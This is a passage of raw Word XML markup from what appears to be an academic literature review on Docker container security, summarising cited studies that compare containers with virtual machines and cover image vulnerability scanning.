        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00F42F69">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00F42F69">
            <w:instrText xml:space="preserve"> CITATION GIR19 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00F42F69">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[70]</w:t>
          </w:r>
          <w:r w:rsidR="00F42F69">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00BB52BD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D80EBD">
        <w:t>provided</w:t>
      </w:r>
      <w:r w:rsidR="009A6786">
        <w:t xml:space="preserve"> an</w:t>
      </w:r>
      <w:r w:rsidR="00D80EBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A54CC">
        <w:t>in-depth</w:t>
      </w:r>
      <w:r w:rsidR="00B919D4">
        <w:t xml:space="preserve"> comparative analysis </w:t>
      </w:r>
      <w:r w:rsidR="00811D6C">
        <w:t xml:space="preserve">between </w:t>
      </w:r>
      <w:r w:rsidR="003652FE">
        <w:t xml:space="preserve">virtualisation </w:t>
      </w:r>
      <w:r w:rsidR="00094266">
        <w:t>and containers</w:t>
      </w:r>
      <w:r w:rsidR="009A164B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00330A40">
        <w:t>with regards to</w:t>
      </w:r>
      <w:r w:rsidR="009A164B">
        <w:t xml:space="preserve"> perfo</w:t>
      </w:r>
      <w:r w:rsidR="007316CE">
        <w:t xml:space="preserve">rmance </w:t>
      </w:r>
      <w:r w:rsidR="00F86669">
        <w:t xml:space="preserve">for processing big data </w:t>
      </w:r>
      <w:r w:rsidR="00620E21">
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidR="00A6209D">
        <w:t>cloud computing</w:t>
      </w:r>
      <w:r w:rsidR="00094266">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00114578">
        <w:t xml:space="preserve"> This paper</w:t>
      </w:r>
      <w:r w:rsidR="000D2C2C">
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidR="000C087A">
        <w:t>a multipurpose</w:t>
      </w:r>
      <w:r w:rsidR="0076052E">
        <w:t xml:space="preserve"> study </w:t>
      </w:r>
      <w:r w:rsidR="006823C1">
        <w:t xml:space="preserve">of </w:t>
      </w:r>
      <w:r w:rsidR="00DA7B25">
        <w:t>containers</w:t>
      </w:r>
      <w:r w:rsidR="008C1AD7">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00DD0032">
        <w:t>discussing container</w:t>
      </w:r>
      <w:r w:rsidR="00490CC5">
        <w:t xml:space="preserve">s architecture, </w:t>
      </w:r>
      <w:r w:rsidR="00E66F45">
        <w:t>pros and cons</w:t>
      </w:r>
      <w:r w:rsidR="008F4099">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008A0B03">
        <w:t xml:space="preserve"> The comp</w:t>
      </w:r>
      <w:r w:rsidR="00D44CC2">
        <w:t>arison is made</w:t>
      </w:r>
      <w:r w:rsidR="002826D1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00130136">
        <w:t>on various methodologies and metrics</w:t>
      </w:r>
      <w:r w:rsidR="00104D23">
        <w:t xml:space="preserve">, including hardware cost, portability, </w:t>
      </w:r>
      <w:r w:rsidR="00EB72F4">
        <w:t xml:space="preserve">scalability, performance, </w:t>
      </w:r>
      <w:r w:rsidR="000437B1">
        <w:t>reliability, isolation</w:t>
      </w:r>
      <w:r w:rsidR="00FF0C71">
        <w:t>, security</w:t>
      </w:r>
      <w:r w:rsidR="00D86907">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00FF0C71">
        <w:t xml:space="preserve"> and others.</w:t>
      </w:r>
      <w:r w:rsidR="00E24C1E">
        <w:t xml:space="preserve"> The article concludes </w:t>
      </w:r>
      <w:r w:rsidR="003F4AA6">
        <w:t xml:space="preserve">that containers </w:t>
      </w:r>
      <w:r w:rsidR="007A577B">
        <w:t>are vul</w:t>
      </w:r>
      <w:r w:rsidR="00420168">
        <w:t>nerable to more attacks</w:t>
      </w:r>
      <w:r w:rsidR="009839A8">
        <w:t xml:space="preserve"> than VM</w:t>
      </w:r>
      <w:r w:rsidR="00420168">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B62CAD">
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="009839A8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B62CAD">
        <w:t xml:space="preserve">provide </w:t>
      </w:r>
      <w:r w:rsidR="00145836">
        <w:t>weaker isolation</w:t>
      </w:r>
      <w:r w:rsidR="003E6075">
        <w:t xml:space="preserve"> and shared resources</w:t>
      </w:r>
      <w:r w:rsidR="001C56C0">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="001A4BBF">
        <w:t>increasing the security issues</w:t>
      </w:r>
      <w:r w:rsidR="001C56C0">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004E70F3">
        <w:t xml:space="preserve"> T</w:t>
      </w:r>
      <w:r w:rsidR="00417A86">
        <w:t>he</w:t>
      </w:r>
      <w:r w:rsidR="00310888">
        <w:t xml:space="preserve"> comparison </w:t>
      </w:r>
      <w:r w:rsidR="00810545">
        <w:t xml:space="preserve">focuses more on performance </w:t>
      </w:r>
      <w:r w:rsidR="008D7457">
        <w:t xml:space="preserve">than </w:t>
      </w:r>
      <w:r w:rsidR="00674EB8">
        <w:t>security</w:t>
      </w:r>
      <w:r w:rsidR="00CB7474">
        <w:t xml:space="preserve">, and thus </w:t>
      </w:r>
      <w:r w:rsidR="009B5A68">
        <w:t xml:space="preserve">the security </w:t>
      </w:r>
      <w:r w:rsidR="007C1374">
        <w:t xml:space="preserve">concept </w:t>
      </w:r>
      <w:r w:rsidR="00EC5304">
        <w:t xml:space="preserve">of </w:t>
      </w:r>
      <w:r w:rsidR="00EC74CD">
        <w:t xml:space="preserve">containers </w:t>
      </w:r>
      <w:r w:rsidR="007C1374">
        <w:t xml:space="preserve">is only mentioned </w:t>
      </w:r>
      <w:r w:rsidR="006C0813">
        <w:t>for comparison without</w:t>
      </w:r>
      <w:r w:rsidR="00A458B9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00471EDF">
        <w:t xml:space="preserve">providing </w:t>
      </w:r>
      <w:r w:rsidR="00A458B9">
        <w:t>a detailed explanation.</w:t>
      </w:r>
      <w:r w:rsidR="004E70F3">
        <w:t xml:space="preserve"> However, t</w:t>
      </w:r>
      <w:r w:rsidR="00656517">
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidR="008D1AC6">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="00BD13AE">
        <w:t xml:space="preserve">paper </w:t>
      </w:r>
      <w:r w:rsidR="00A52E50">
        <w:t>reviewed</w:t>
      </w:r>
      <w:r w:rsidR="00850995">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A870EC">
        <w:t xml:space="preserve">the concept of Docker containers </w:t>
      </w:r>
      <w:r w:rsidR="00603EB3">
        <w:t xml:space="preserve">meticulously </w:t>
      </w:r>
      <w:r w:rsidR="00CC6C19">
        <w:t>and br</w:t>
      </w:r>
      <w:r w:rsidR="00810722">
        <w:t>iefly</w:t>
      </w:r>
      <w:r w:rsidR="008773D9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00317F0D">
        <w:t>and provide</w:t>
      </w:r>
      <w:r w:rsidR="005C0BBD">
        <w:t>d a</w:t>
      </w:r>
      <w:r w:rsidR="00317F0D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005D78A2">
        <w:t xml:space="preserve">credible and </w:t>
      </w:r>
      <w:r w:rsidR="005C0BBD">
        <w:t>significant</w:t>
      </w:r>
      <w:r w:rsidR="003527BF">
        <w:t xml:space="preserve"> reference count.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB756E0" w14:textId="54E57DC6" w:rsidR="00B63069" w:rsidRDefault="006A6DEC" w:rsidP="007B655A">
      <w:r>
        <w:t>An i</w:t>
      </w:r>
      <w:r w:rsidR="001E5C59">
        <w:t xml:space="preserve">n-depth </w:t>
      </w:r>
      <w:r w:rsidR="00B86ADC">
        <w:t>comp</w:t>
      </w:r>
      <w:r w:rsidR="00225B8B">
        <w:t xml:space="preserve">arative </w:t>
      </w:r>
      <w:r w:rsidR="001E5C59">
        <w:t xml:space="preserve">analysis </w:t>
      </w:r>
      <w:r w:rsidR="00572DC0">
        <w:t>of Docker security</w:t>
      </w:r>
      <w:r w:rsidR="008B5A76">
        <w:t xml:space="preserve"> in cloud PAAS,</w:t>
      </w:r>
      <w:r w:rsidR="00572DC0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00225B8B">
        <w:t>with other container technologies and VM</w:t>
      </w:r>
      <w:r w:rsidR="002E658A">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00225B8B">
        <w:t xml:space="preserve"> is presented in</w:t>
      </w:r>
      <w:r w:rsidR="00481047">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-768240041"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00642D46">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00642D46">
            <w:instrText xml:space="preserve"> CITATION ARM16 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00642D46">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[71]</w:t>
          </w:r>
          <w:r w:rsidR="00642D46">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00642D46">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009F6547">
        <w:t xml:space="preserve"> The authors </w:t>
      </w:r>
      <w:r w:rsidR="00812F6B">
        <w:t xml:space="preserve">presented the overview </w:t>
      </w:r>
      <w:r w:rsidR="00692653">
        <w:t>of Docker security using Linux kernel features, including namespaces</w:t>
      </w:r>
      <w:r w:rsidR="00180F58">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00234210">
        <w:t>Cgroups, and the union file systems (UFS).</w:t>
      </w:r>
      <w:r w:rsidR="00F14177">
        <w:t xml:space="preserve"> The UFS </w:t>
      </w:r>
      <w:r w:rsidR="00346B89">
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidR="00341B58">
        <w:t xml:space="preserve"> used to </w:t>
      </w:r>
      <w:r w:rsidR="005D0DC4">
        <w:t>mount</w:t>
      </w:r>
      <w:r w:rsidR="00341B58">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00634D7B">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00341B58">
        <w:t xml:space="preserve">container’s file system </w:t>
      </w:r>
      <w:r w:rsidR="005D0DC4">
        <w:t>to a virtual file system.</w:t>
      </w:r>
      <w:r w:rsidR="00163E55">
        <w:t xml:space="preserve"> In Docker, n</w:t>
      </w:r>
      <w:r w:rsidR="00514E82">
        <w:t xml:space="preserve">amespaces and Cgroups </w:t>
      </w:r>
      <w:r w:rsidR="00D45BF9">
        <w:t xml:space="preserve">provide isolation and </w:t>
      </w:r>
      <w:r w:rsidR="006B4840">
        <w:t xml:space="preserve">allocation resources </w:t>
      </w:r>
      <w:r w:rsidR="00E82207">
        <w:t>to containers, respectively.</w:t>
      </w:r>
      <w:r w:rsidR="008622B9">
        <w:t xml:space="preserve"> According to the authors</w:t>
      </w:r>
      <w:r w:rsidR="00D212F1">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00DF5F9B">
        <w:t>Dock</w:t>
      </w:r>
      <w:r w:rsidR="002B61C6">
        <w:t xml:space="preserve">er </w:t>
      </w:r>
      <w:r w:rsidR="00D212F1">
        <w:t xml:space="preserve">kernel features </w:t>
      </w:r>
      <w:r w:rsidR="007A7314">
        <w:t xml:space="preserve">need to </w:t>
      </w:r>
      <w:r w:rsidR="00346B89">
        <w:t>be adequately</w:t>
      </w:r>
      <w:r w:rsidR="007A7314">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E350DE">
        <w:t xml:space="preserve">managed and monitored </w:t>
      </w:r>
      <w:r w:rsidR="00615D19">
        <w:t xml:space="preserve">for security </w:t>
      </w:r>
      <w:r w:rsidR="000E44EE">
        <w:t>reasons</w:t>
      </w:r>
      <w:r w:rsidR="009164F8">
        <w:t xml:space="preserve">, including </w:t>
      </w:r>
      <w:r w:rsidR="00492ED8">
        <w:t xml:space="preserve">pen testing and compatibility checking </w:t>
      </w:r>
      <w:r w:rsidR="00013861">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="0046470B">
        <w:t>secure containers</w:t>
      </w:r>
      <w:r w:rsidR="00013861">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C961C5">
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidR="00346B89">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00C961C5">
        <w:t>real live production environment.</w:t>
      </w:r>
      <w:r w:rsidR="00A02763">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A83CD2F" w14:textId="27F224F5" w:rsidR="00CC433E" w:rsidRPr="007B655A" w:rsidRDefault="00A02763" w:rsidP="007B655A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidR="0060797A">
        <w:t xml:space="preserve"> authors </w:t>
      </w:r>
      <w:r w:rsidR="008640BB">
        <w:t xml:space="preserve">also </w:t>
      </w:r>
      <w:r w:rsidR="004D20A9">
        <w:t>provided</w:t>
      </w:r>
      <w:r w:rsidR="0019343D">
        <w:t xml:space="preserve"> best </w:t>
      </w:r>
      <w:r w:rsidR="00922801">
        <w:t>practices for securing containers</w:t>
      </w:r>
      <w:r w:rsidR="00FB042E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">along with </w:t>
      </w:r>
      <w:r w:rsidR="002471B1">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00DD7D4E">
        <w:t>brief description of its security challenges.</w:t>
      </w:r>
      <w:r w:rsidR="00BE487F">
        <w:t xml:space="preserve"> The research shows that </w:t>
      </w:r>
      <w:r w:rsidR="00A758C9">
        <w:t xml:space="preserve">implementing </w:t>
      </w:r>
      <w:r w:rsidR="00F07A30">
        <w:t>DCT</w:t>
      </w:r>
      <w:r w:rsidR="00806679">
        <w:t xml:space="preserve">, VPN, and SSL </w:t>
      </w:r>
      <w:r w:rsidR="00F3153A">
        <w:t xml:space="preserve">enhances the security </w:t>
      </w:r>
      <w:r w:rsidR="002471B1">
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidR="00F3153A">
        <w:t xml:space="preserve"> containers</w:t>
      </w:r>
      <w:r w:rsidR="00F71AC8">
        <w:t xml:space="preserve">, especially </w:t>
      </w:r>
      <w:r w:rsidR="00D93391">
        <w:t xml:space="preserve">when using </w:t>
      </w:r>
      <w:r w:rsidR="002471B1">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00D93391">
        <w:t xml:space="preserve">public </w:t>
      </w:r>
      <w:r w:rsidR="007E2CD2">
        <w:t>repository, like Docker Hub</w:t>
      </w:r>
      <w:r w:rsidR="00F3153A">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C04DBE">
        <w:t xml:space="preserve"> Further, </w:t>
      </w:r>
      <w:r w:rsidR="00596C08">
        <w:t>they</w:t>
      </w:r>
      <w:r w:rsidR="00954C0A">
        <w:t xml:space="preserve"> evaluated and compared Docker security </w:t>
      </w:r>
      <w:r w:rsidR="00C1377B">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00131484">
        <w:t>VM</w:t>
      </w:r>
      <w:r w:rsidR="003752DA">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BA7809">
        <w:t xml:space="preserve"> The comparison </w:t>
      </w:r>
      <w:r w:rsidR="0071436B">
        <w:t>resulted that VM are significantly secure than containers.</w:t>
      </w:r>
      <w:r w:rsidR="00ED7A26">
        <w:t xml:space="preserve"> Lastly, </w:t>
      </w:r>
      <w:r w:rsidR="00601F9B">
        <w:t>they</w:t>
      </w:r>
      <w:r w:rsidR="0056652A">
        <w:t xml:space="preserve"> proposed </w:t>
      </w:r>
      <w:r w:rsidR="00061D1D">
        <w:t xml:space="preserve">a solution for </w:t>
      </w:r>
      <w:r w:rsidR="00B16825">
        <w:t xml:space="preserve">improving </w:t>
      </w:r>
      <w:r w:rsidR="00C850E6">
        <w:t xml:space="preserve">Docker kernel </w:t>
      </w:r>
      <w:r w:rsidR="00CE1057">
        <w:t>security using user namespaces</w:t>
      </w:r>
      <w:r w:rsidR="005029E2">
        <w:t xml:space="preserve"> features</w:t>
      </w:r>
      <w:r w:rsidR="00CE1057">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00735D9C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003319F4">
        <w:t xml:space="preserve">The authors conclude </w:t>
      </w:r>
      <w:r w:rsidR="008B33DE">
        <w:t xml:space="preserve">containers inside VM </w:t>
      </w:r>
      <w:r w:rsidR="00780211">
        <w:t xml:space="preserve">provide better security </w:t>
      </w:r>
      <w:r w:rsidR="009F2B2E">
        <w:t>compar</w:t>
      </w:r>
      <w:r w:rsidR="00BD79F2">
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="009F2B2E">
        <w:t xml:space="preserve"> to containers running on a </w:t>
      </w:r>
      <w:r w:rsidR="00AA1100">
        <w:t>typical host</w:t>
      </w:r>
      <w:r w:rsidR="00D010FB">
        <w:t xml:space="preserve"> but at the cost of performance.</w:t>
      </w:r>
      <w:r w:rsidR="004533D3">
        <w:t xml:space="preserve"> Th</w:t>
      </w:r>
      <w:r w:rsidR="000D6C52">
        <w:t xml:space="preserve">is article </w:t>
      </w:r>
      <w:r w:rsidR="00314B10">
        <w:t xml:space="preserve">covers </w:t>
      </w:r>
      <w:r w:rsidR="00DF4CFE">
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="00D02411">
        <w:t xml:space="preserve"> security of Docker </w:t>
      </w:r>
      <w:r w:rsidR="00134984">
        <w:t xml:space="preserve">with </w:t>
      </w:r>
      <w:r w:rsidR="00EE58C8">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00134984">
        <w:t xml:space="preserve">wide </w:t>
      </w:r>
      <w:r w:rsidR="001411C0">
        <w:t>variety</w:t>
      </w:r>
      <w:r w:rsidR="009A2FDC">
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:r w:rsidR="00D01577">
        <w:t>reliable sources briefly</w:t>
      </w:r>
      <w:r w:rsidR="00004394" w:rsidRPr="00004394">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1684006688"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00004394">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00004394">
            <w:instrText xml:space="preserve"> CITATION ARM16 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00004394">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[71]</w:t>
          </w:r>
          <w:r w:rsidR="00004394">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00D01577">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0019447E">
        <w:t xml:space="preserve"> A similar </w:t>
      </w:r>
      <w:r w:rsidR="00951EAA">
        <w:t xml:space="preserve">comparative study </w:t>
      </w:r>
      <w:r w:rsidR="00B62D8A">
        <w:t xml:space="preserve">of VM and containers is </w:t>
      </w:r>
      <w:r w:rsidR="004A7F55">
        <w:t xml:space="preserve">carried out in </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1625232147"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00D26662">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00D26662">
            <w:instrText xml:space="preserve"> CITATION SMa18 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00D26662">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[72]</w:t>
          </w:r>
          <w:r w:rsidR="00D26662">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00362C57">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E039F7A" w14:textId="2C22E614" w:rsidR="00AF1C64" w:rsidRDefault="002632BD" w:rsidP="009048CA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc86859271"/>
      <w:r>
        <w:t xml:space="preserve">Docker </w:t>
      </w:r>
      <w:r w:rsidR="009048CA">
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nside </w:t>
      </w:r>
      <w:r w:rsidR="009048CA">
        <w:t>Threats</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p w14:paraId="51E14935" w14:textId="40438405" w:rsidR="009048CA" w:rsidRDefault="00513FB8" w:rsidP="009048CA">
      <w:r>
        <w:t xml:space="preserve">Docker </w:t>
      </w:r>
      <w:r w:rsidR="00A503A7">
        <w:t xml:space="preserve">system </w:t>
      </w:r>
      <w:r w:rsidR="00F359B6">
        <w:t xml:space="preserve">contains </w:t>
      </w:r>
      <w:r w:rsidR="00056543">
        <w:t>various components</w:t>
      </w:r>
      <w:r w:rsidR="00A54D17">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000C08DD">
        <w:t xml:space="preserve">containing images, containers, </w:t>
      </w:r>
      <w:r w:rsidR="00082849">
        <w:t>networks, and volumes.</w:t>
      </w:r>
      <w:r w:rsidR="00F11420">
        <w:t xml:space="preserve"> Hence, </w:t>
      </w:r>
      <w:r w:rsidR="007C12D5">
        <w:t xml:space="preserve">the security aspect of each </w:t>
      </w:r>
      <w:r w:rsidR="00052DB6">
        <w:t xml:space="preserve">component is crucial to </w:t>
      </w:r>
      <w:r w:rsidR="001A102E">
        <w:t xml:space="preserve">provide a safe and secure </w:t>
      </w:r>
      <w:r w:rsidR="00391A82">
        <w:t xml:space="preserve">Docker </w:t>
      </w:r>
      <w:r w:rsidR="00585DBF">
        <w:t>ecosystem.</w:t>
      </w:r>
      <w:r w:rsidR="00FF784E">
        <w:t xml:space="preserve"> The authors in</w:t>
      </w:r>
      <w:r w:rsidR="00073689">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-103575382"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00073689">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00073689">
            <w:instrText xml:space="preserve"> CITATION VJa21 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00073689">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[73]</w:t>
          </w:r>
          <w:r w:rsidR="00073689">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00FF784E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00600451">
        <w:t xml:space="preserve">reviewed </w:t>
      </w:r>
      <w:r w:rsidR="0057726D">
        <w:t xml:space="preserve">current Docker security </w:t>
      </w:r>
      <w:r w:rsidR="00132F21">
        <w:t xml:space="preserve">using </w:t>
      </w:r>
      <w:r w:rsidR="00A54D17">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="005F4ECB">
        <w:t>static analysis approach</w:t>
      </w:r>
      <w:r w:rsidR="00E149BB">
        <w:t xml:space="preserve"> for vulnerabilities, </w:t>
      </w:r>
      <w:r w:rsidR="00C863ED">
        <w:t>threats, and tools. In particular,</w:t>
      </w:r>
      <w:r w:rsidR="00C519FA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003D769F">
        <w:t xml:space="preserve">they </w:t>
      </w:r>
      <w:r w:rsidR="009A046B">
        <w:t xml:space="preserve">conducted </w:t>
      </w:r>
      <w:r w:rsidR="00A54D17">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="009A046B">
        <w:t xml:space="preserve">static analysis </w:t>
      </w:r>
      <w:r w:rsidR="00AC6278">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="002C0258">
        <w:t>investigate vulnerabilit</w:t>
      </w:r>
      <w:r w:rsidR="009907CB">
        <w:t xml:space="preserve">ies </w:t>
      </w:r>
      <w:r w:rsidR="0065057C">
        <w:t xml:space="preserve">on several images </w:t>
      </w:r>
      <w:r w:rsidR="00706E91">
        <w:t xml:space="preserve">using </w:t>
      </w:r>
      <w:r w:rsidR="00C66694">
        <w:t>free Docker scanning tools</w:t>
      </w:r>
      <w:r w:rsidR="006C23F8">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00724094">
        <w:t xml:space="preserve"> They also </w:t>
      </w:r>
      <w:r w:rsidR="00EA749E">
        <w:t xml:space="preserve">presented </w:t>
      </w:r>
      <w:r w:rsidR="00200DB9">
        <w:t>some</w:t>
      </w:r>
      <w:r w:rsidR="00C246EE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00667270">
        <w:t xml:space="preserve">main </w:t>
      </w:r>
      <w:r w:rsidR="00B81C9F">
        <w:t>security threats</w:t>
      </w:r>
      <w:r w:rsidR="007F0CF7">
        <w:t xml:space="preserve"> and attacks</w:t>
      </w:r>
      <w:r w:rsidR="00B81C9F">
        <w:t xml:space="preserve"> in images</w:t>
      </w:r>
      <w:r w:rsidR="00171D4A">
        <w:t xml:space="preserve"> along with their remediation techniques.</w:t>
      </w:r>
      <w:r w:rsidR="00DA55F5">
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r w:rsidR="00A31A47">
        <w:t xml:space="preserve">main threats </w:t>
      </w:r>
      <w:r w:rsidR="0032265A">
        <w:t>on Docker images include cautious, vulnerable</w:t>
      </w:r>
      <w:r w:rsidR="00213A5D">
        <w:t>, and attack</w:t>
      </w:r>
      <w:r w:rsidR="00DA69C9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00213A5D">
        <w:t>images</w:t>
      </w:r>
      <w:r w:rsidR="00643291">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00532FDA">
        <w:t xml:space="preserve"> However, verifying and scanning Docker image</w:t>
      </w:r>
      <w:r w:rsidR="008A4A89">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00CB5D02">
        <w:t xml:space="preserve"> as well as utilising trusted </w:t>
      </w:r>
      <w:r w:rsidR="00372C2D">
        <w:t>images</w:t>
      </w:r>
      <w:r w:rsidR="008A4A89">
        <w:t xml:space="preserve"> helps to avoid such attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47688595" w14:textId="7A2C2109" w:rsidR="00FE5334" w:rsidRDefault="00A63B0A" w:rsidP="009048CA">
      <w:r>
        <w:t xml:space="preserve">Further, the authors </w:t>
      </w:r>
      <w:r w:rsidR="000A17CF">
        <w:t xml:space="preserve">compared and evaluated </w:t>
      </w:r>
      <w:r w:rsidR="005F7958">
        <w:t xml:space="preserve">various </w:t>
      </w:r>
      <w:r w:rsidR="007E503F">
        <w:t xml:space="preserve">existing </w:t>
      </w:r>
      <w:r w:rsidR="00CD3429">
        <w:t xml:space="preserve">Docker image </w:t>
      </w:r>
      <w:r w:rsidR="009925C3">
        <w:t xml:space="preserve">vulnerabilities </w:t>
      </w:r>
      <w:r w:rsidR="00CD3429">
        <w:t>tools.</w:t>
      </w:r>
      <w:r w:rsidR="00ED56C6">
        <w:t xml:space="preserve"> They also </w:t>
      </w:r>
      <w:r w:rsidR="006E36DA">
